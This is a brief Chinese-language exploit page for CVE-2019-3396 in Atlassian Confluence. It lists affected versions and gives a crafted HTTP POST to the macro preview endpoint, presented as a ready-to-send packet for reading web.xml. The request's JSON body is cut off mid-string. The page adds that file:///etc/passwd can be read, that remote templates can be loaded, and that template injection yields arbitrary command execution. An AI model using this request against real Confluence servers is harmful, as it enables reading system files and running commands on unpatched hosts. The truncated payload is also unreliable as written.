# CVE-2019-3396 Atlassian Confluence 路徑穿越&命令執行漏洞
==漏洞影響==
所有1.xx,2.xx,3.xx,4.xx和5.xx版本 所有6.0.x,6.1.x,6.2.x,6.3.x,6.4.x和6.5.x版本 6.6.12之前的所有6.6.x版本 所有6.7.x,6.8.x,6.9.x,6.10.x和6.11.x版本 6.12.3之前的所有6.12.x版本 6.13.3之前的所有6.13.x版本 6.14.2之前的所有6.14.x版本
==漏洞利用==
發送如下數據包,即可讀取文件web.xml
POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: localhost:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23& Content-Type: application/json; charset=utf-8 Content-Length: 176 {"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","w
6.12以前的Confluence沒有限製文件讀取的協議和路徑,我們可以使用file:///etc/passwd來讀取文件,也可以通過https://…來加載遠程文件。
該文件是一個Velocity模板,我們可以通過模板注入(SSTI)來執行任意命令。
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容